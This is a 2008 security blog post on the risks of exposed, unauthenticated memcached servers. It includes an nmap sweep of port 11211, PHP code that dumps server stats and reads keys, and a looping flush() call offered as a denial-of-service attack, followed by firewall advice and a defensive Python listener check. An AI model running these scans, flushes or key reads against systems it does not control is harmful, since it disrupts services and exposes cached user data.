June 15th, 2008
infiltrate

Hacking Memcache

(A braindump/discussion on memcache security)

A quick brief on memcache, ripped from Wikipedia:

memcached is a general-purpose distributed memory caching system that was originally developed by Danga Interactive for LiveJournal, but is now used by many other sites. It is often used to speed up dynamic database-driven websites by caching data and objects in memory to reduce the number of times the database must be read.

To illustrate the popularity of memcache:

The system is used by several very large, well-known sites including YouTube[2], LiveJournal, Slashdot, Wikipedia, SourceForge, ShowClix, GameFAQs, Facebook, Digg, Twitter[3], Fotolog, BoardGameGeek, NYTimes.com, deviantART, Jamendo, Kayak and Netlog.

Memcache is extremely specific in its function: it caches data in memory. Because it is that simple, it is trivial to set up and use. From a security standpoint, memcache is one more process on a system, and it increases complexity.

Comparison to MySQL

While MySQL and Memcache are apples and oranges, they both bear fruit. Memcache is frequently used in parallel with MySQL, an open source database. The major difference is that MySQL (and other databases) has authentication and authorization; for instance, it’s possible to create a MySQL user with the sole permission to ‘insert’ data. MySQL and Memcache are related because MySQL data frequently lives in memcache, and memcache therefore becomes part of MySQL’s security model.

Exposure

Because Memcache lacks any form of authentication, any exposure of memcached to an attacker provides fully privileged access to the data. Memcache also starts with a default TCP port of 11211, giving it a known location for internet scans.

nmap 192.168.0.0/16 -p 11211 -P0

I’ll make another bold assumption that most memcache installations won’t be run on the same machine as their web server… meaning these memcache config lines will be at risk of misconfiguration:

# Specify which IP address to listen on. The default is to listen on all IP addresses
# This parameter is one of the only security measures that memcached has, so make sure
# it’s listening on a firewalled interface.
#-l 127.0.0.
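An added example, not part of the original post, for checking the bind-address point above from the defender’s side: it parses the listener table printed by `ss -ltn` (the sample output below is constructed, not captured from a real host) and classifies every memcache listener as exposed (wildcard bind, which is what a commented-out `-l` gives you), loopback-only, or bound to one specific interface. Running it on a real host assumes Linux with iproute2’s `ss` available.

```python
import subprocess

MEMCACHE_PORT = 11211
# Addresses that mean "every interface", i.e. the default when -l is left commented out.
WILDCARD_ADDRS = {"0.0.0.0", "*", "[::]", "::"}
LOOPBACK_ADDRS = {"127.0.0.1", "[::1]", "::1"}

# Constructed sample output of `ss -ltn` (not captured from a real host):
# one host left on the default wildcard bind, one fixed to loopback.
SAMPLE_EXPOSED = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      1024   0.0.0.0:11211       0.0.0.0:*
LISTEN 0      1024   [::]:11211          [::]:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
"""
SAMPLE_FIXED = """State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      1024   127.0.0.1:11211     0.0.0.0:*
"""

def listening_sockets(ss_output):
    """Return (address, port) pairs for every LISTEN row of `ss -ltn` output."""
    sockets = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue  # header line or non-listening row
        addr, _, port = fields[3].rpartition(":")  # rpartition keeps IPv6 brackets intact
        sockets.append((addr, int(port)))
    return sockets

def memcache_findings(ss_output, port=MEMCACHE_PORT):
    """Classify each memcache listener: 'exposed' (wildcard bind), 'loopback', or
    'interface' (a specific address, acceptable only if that interface is firewalled)."""
    findings = []
    for addr, p in listening_sockets(ss_output):
        if p != port:
            continue
        if addr in WILDCARD_ADDRS:
            findings.append(("exposed", addr))
        elif addr in LOOPBACK_ADDRS:
            findings.append(("loopback", addr))
        else:
            findings.append(("interface", addr))
    return findings

def check_this_host():
    """Run the classification against the local machine's listener table."""
    out = subprocess.run(["ss", "-ltn"], capture_output=True, text=True, check=True).stdout
    return memcache_findings(out)
```

Any "exposed" result means the daemon answers on every interface and only a firewall stands between it and the nmap sweep above; fix it with an explicit `-l` on a private address and a firewall rule on TCP 11211.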

Potential Attacks on Memcache

Assuming we can find an exposed memcache server on a network or the internet, what kind of damage can be done?

Recon

In PHP, a simple memcache script will connect to the server:

$memcache = new Memcache();
$memcache->connect('target', 11211) or die("Could not connect");

From here, we can dump stats on the server:

$stats = $memcache->getExtendedStats();
print_r($stats); // echo would only print "Array"; print_r dumps the nested stats array

Which provides us with:

[target:11211] => Array
(
[pid] => 17924
[uptime] => 1654
[time] => 1213583634
[version] => 1.2.1
[pointer_size] => 32
[rusage_user] => 0.000000
[rusage_system] => 0.068004
[curr_items] => 1
[total_items] => 1
[bytes] => 111
[curr_connections] => 2
[total_connections] => 8
[connection_structures] => 3
[cmd_get] => 1
[cmd_set] => 1
[get_hits] => 1
[get_misses] => 0
[bytes_read] => 167
[bytes_written] => 1487
[limit_maxbytes] => 67108864
)

)

While there isn’t much of value here to gain any sort of foothold on the server, there is at least a version number and the system time. The former can be used to search for known vulnerabilities, and the system time may be needed for some obscure attack on the system’s crypto, if it has any. The rest of the data may be used for other attacks: it’s all at least recon.

Denial of Service

This one is pretty easy.

// $memcache_obj is a connected Memcache instance, as above
while (true) {
    $memcache_obj->flush();
    sleep(5);
}

This should clear out all stored keys every 5 seconds.

Tampering / Data Breach

There doesn’t seem to be any supported means of enumerating the existing memcache keys, but there’s always brute force. Because memcache is totally open once it’s found, you can read or modify any available key on the system. The hard part is knowing what keys are there:

$var = $memcache_obj->get('some_key');

In any attack there may be other information available as to what the system is running and what it may be using memcache for. In proprietary or home-grown systems the key names may be nearly impossible to figure out, but open source systems are different.

Conclusion

Securing memcache from the internet with a firewall mitigates most threats. One can assume plenty of memcache admins will fuck this up.

Short point of this article: if you can hit a memcache port (TCP 11211), nothing will prevent reading and writing to the cache, getting info about the server, or DoS to the application.

I am an (ex) security researcher, and currently manage several security teams at Facebook